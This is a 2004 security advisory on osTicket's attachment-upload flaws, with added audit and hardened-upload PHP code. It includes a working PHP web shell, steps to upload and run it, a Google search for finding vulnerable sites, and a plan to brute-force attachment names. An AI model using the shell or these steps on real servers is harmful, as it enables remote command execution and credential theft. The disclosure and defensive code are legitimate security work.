ATTENTION ALL SITES USING OSTICKET. PLEASE DISABLE UPLOADS.
June 17 2004. Multiple Problems with osTicket
Software Data:
OSTICKET, http://www.osticket.com/
"Need to test the system before you install? Then try our demo version of the latest release of osTicket.
DEMO DISABLED"
Note: When a software group will not run their own program, you know it's not safe for you to run.
Problem:
On cPanel hosts and many other web servers, directory indexing is enabled for the /osticket/attachments/ folder, so the server shows a listing of everything in it. The documents here are private and often financial in nature.
Solution:
Disable directory listing, and change osTicket's upload code so that attachments are not stored under a web-accessible, guessable path where the server will execute them.
Details:
First, find a site running osTicket:
www.example.com/osticket/
Create a new ticket and attach a file to it.
Visit
www.example.com/osticket/attachments/
Now you see your uploaded file here. If you uploaded a PHP document containing the following (written here to read cmd from the query string instead of relying on register_globals, which the original version assumed to be on):
<?php
// Minimal web shell: runs the "cmd" query parameter with the web server's privileges.
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : '';
echo "<form action=''><input type='text' name='cmd' value='" . htmlspecialchars($cmd) . "' size='75'><br>";
if ($cmd === '') die;
system($cmd);
?>
you can now run commands on the server as the web server user by opening the script's URL and submitting a command in the form.
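To check your own installation for the conditions just described (the folder is reachable by URL, server-side scripts are sitting in it, names carry a predictable number prefix, and no per-directory rule turns listing or PHP execution off), here is an audit script. It is an added example for this page, not osTicket's own code; the directory layout and the sample files it creates in a temporary web root are constructed for the demonstration.

```php
<?php
// Added example, not osTicket's own code: audit an osTicket attachments folder for the
// conditions the advisory describes. The directory layout and the sample file names
// built below are assumptions for the demonstration.

function audit_attachments_dir(string $dir, string $docroot): array
{
    $findings = [];
    $sep  = DIRECTORY_SEPARATOR;
    $real = realpath($dir);
    $root = realpath($docroot);
    if ($real === false) {
        return ["attachments directory not found: $dir"];
    }

    // 1. If the folder sits under the document root, every file in it has a URL.
    if ($root !== false && strpos($real . $sep, $root . $sep) === 0) {
        $findings[] = "attachments folder is inside the web root: $real";
    }

    // 2. Files Apache would hand to an interpreter instead of serving as data.
    $interpreted = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar', 'cgi', 'pl', 'sh'];
    foreach (scandir($real) as $name) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (in_array($ext, $interpreted, true)) {
            $findings[] = "server-side script stored as an attachment: $name";
        }
        // 3. Names of the form <number>_<original name> are guessable; with the
        //    ticket number as the prefix they need no guessing at all.
        if (preg_match('/^\d+_/', $name)) {
            $findings[] = "attachment name has a predictable numeric prefix: $name";
        }
    }

    // 4. Per-directory Apache rules (only honoured when AllowOverride permits them).
    $htaccess = $real . $sep . '.htaccess';
    $conf = is_file($htaccess) ? file_get_contents($htaccess) : '';
    if (stripos($conf, '-Indexes') === false) {
        $findings[] = 'no "Options -Indexes" in .htaccess: directory listing may be on';
    }
    $blocksExec = stripos($conf, 'engine off') !== false
        || stripos($conf, 'deny from all') !== false
        || stripos($conf, 'require all denied') !== false;
    if (!$blocksExec) {
        $findings[] = 'no .htaccess rule that stops uploaded PHP from executing';
    }
    return $findings;
}

// Constructed demonstration: a throwaway web root with an attachments folder that
// shows every problem, then the same folder after the per-directory fixes.
$docroot = sys_get_temp_dir() . '/osticket-audit-' . bin2hex(random_bytes(4));
$attach  = "$docroot/osticket/attachments";
mkdir($attach, 0700, true);
file_put_contents("$attach/123456_cmd.php", "<?php system(\$_GET['cmd']);\n");
file_put_contents("$attach/123457_invoice.pdf", "%PDF-1.4 sample\n");

echo "Before:\n";
foreach (audit_attachments_dir($attach, $docroot) as $f) {
    echo "  - $f\n";
}

unlink("$attach/123456_cmd.php");
file_put_contents("$attach/.htaccess", "Options -Indexes\nphp_flag engine off\n");
echo "After:\n";
foreach (audit_attachments_dir($attach, $docroot) as $f) {
    echo "  - $f\n";
}
```

Run it with the PHP CLI. The "After" run still reports that the folder is inside the web root and that the PDF has a numeric prefix: an .htaccess only helps where Apache honours it, so moving the store out of the document root and dropping the number prefix remain necessary.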
There's more:
osTicket limits the size of uploads through a hidden field in the submit form. That field is sent by the browser, so a user can edit it and upload a file of any size, possibly leading to the site being shut down if it has disk-space or traffic limits. The only limits that hold are the ones the server enforces: PHP's upload_max_filesize and post_max_size settings, and a size check in the upload handler itself.
Extra:
About 2/3 of sites using osTicket do not have directory listings turned on. They are still not safe from a determined attacker. When a file is uploaded it is renamed ######_filename, where ###### is a six-digit number (described as random at the time of writing; see the update below). Because there is no per-IP limit on the number of tickets, a user could upload the PHP script, say, 100 times and then use another script to request numbers followed by _name. With 100 copies spread over the 10^6 possible prefixes, each guess hits with probability about 1 in 10,000, so on average around 10k requests are needed (an expected value, not a hard maximum). This means the other 2/3 of sites are hackable too, just over a longer period of time.
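The size field, the executable upload and the guessable name are all fixed by the same change to the upload code: enforce the limit server-side, allowlist what may be stored, keep the store outside the document root, name files with a random token unrelated to the ticket number, and serve them only through a download script. The handler below is an added example for this page, not osTicket's own code; it assumes modern PHP (7 or later), that the upload arrives as $_FILES['attachment'], that the STORE_DIR path is not mapped to any URL, and that the caller saves the returned metadata in the ticket's database row.

```php
<?php
// Added example, not osTicket's own code: a hardened attachment handler.
// Assumptions: the upload arrives as $_FILES['attachment'], STORE_DIR is outside the
// document root and readable only by the PHP user, and the returned metadata is saved
// in the ticket's database row by the caller.

const STORE_DIR = '/var/lib/osticket/attachments';  // assumed path, not web-accessible
const MAX_ATTACHMENT_BYTES = 1048576;                // 1 MiB, enforced here, not by the form
const ALLOWED_TYPES = [                              // extension => MIME type the bytes must have
    'pdf' => 'application/pdf',
    'txt' => 'text/plain',
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
];

function store_attachment(array $file, string $storeDir = STORE_DIR): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or was rejected by PHP');
    }
    // Size is taken from the file PHP already wrote to disk; the hidden size field in
    // the form and the client's Content-Length are both under the uploader's control.
    $size = filesize($file['tmp_name']);
    if ($size === false || $size === 0 || $size > MAX_ATTACHMENT_BYTES) {
        throw new RuntimeException('attachment is empty or over the server-side limit');
    }
    // Allowlist of extensions, and the bytes must match the claimed type: "shell.php"
    // fails the list, "shell.pdf" containing PHP source fails the finfo check.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException("attachment type .$ext is not allowed");
    }
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($detected !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("content looks like $detected, not " . ALLOWED_TYPES[$ext]);
    }
    // Storage name is a random token: not the ticket number and not the original name,
    // so neither a directory listing nor knowledge of a ticket number locates it.
    $token = bin2hex(random_bytes(16));
    $dest  = rtrim($storeDir, '/') . '/' . $token;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    chmod($dest, 0640);  // data only, never executable
    return [
        'token' => $token,
        'name'  => basename($file['name']),
        'mime'  => ALLOWED_TYPES[$ext],
        'size'  => $size,
    ];
}

function send_attachment(array $meta, string $storeDir = STORE_DIR): void
{
    // Downloads go through this function after the caller has checked that the
    // requester may see the ticket; the web server never maps the store to a URL.
    if (!preg_match('/^[0-9a-f]{32}$/', $meta['token'])) {
        http_response_code(404);
        return;
    }
    $path = rtrim($storeDir, '/') . '/' . $meta['token'];
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $safeName = str_replace(['"', "\r", "\n", '\\'], '', $meta['name']);
    header('Content-Type: ' . $meta['mime']);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Usage inside the ticket-submission request (skipped when run from the command line).
if (PHP_SAPI !== 'cli' && isset($_FILES['attachment'])) {
    try {
        $meta = store_attachment($_FILES['attachment']);
        // ... save $meta with the ticket; the token is what the download link carries
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage());
    }
}
```

Keep PHP's upload_max_filesize and post_max_size at or below MAX_ATTACHMENT_BYTES as well, so oversized bodies are dropped before the handler runs. Rate-limiting ticket creation per IP is still worth adding, since it is what made the bulk-upload attack cheap, but it is no longer what stands between an attacker and command execution.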
I am sorry to all the servers that were hacked to discover this exploit. (funny joke)
Other:
cPanel includes osTicket, and osTicket is free, so installations are common. Sites can be found on Google with a query like the following, adjusted to whatever you want:
http://www.google.com./search?q=%22Main%22+%22Help%22+%22Support+Ticket+System%22+php+attachment&hl=en&lr=&ie=UTF-8&start=10&sa=N
osTicket needs a MySQL database, and with command execution an attacker can read osTicket's configuration, which contains the database login details.
Greets: Jack, the general, www.wehack.com
~`TOBY`~
UPDATE JUNE 21ST
It's not random numbers, it's the ticket number you are given! Since the prefix is the ticket number shown to the submitter, the attachment's URL can be computed without any guessing: all servers are vulnerable.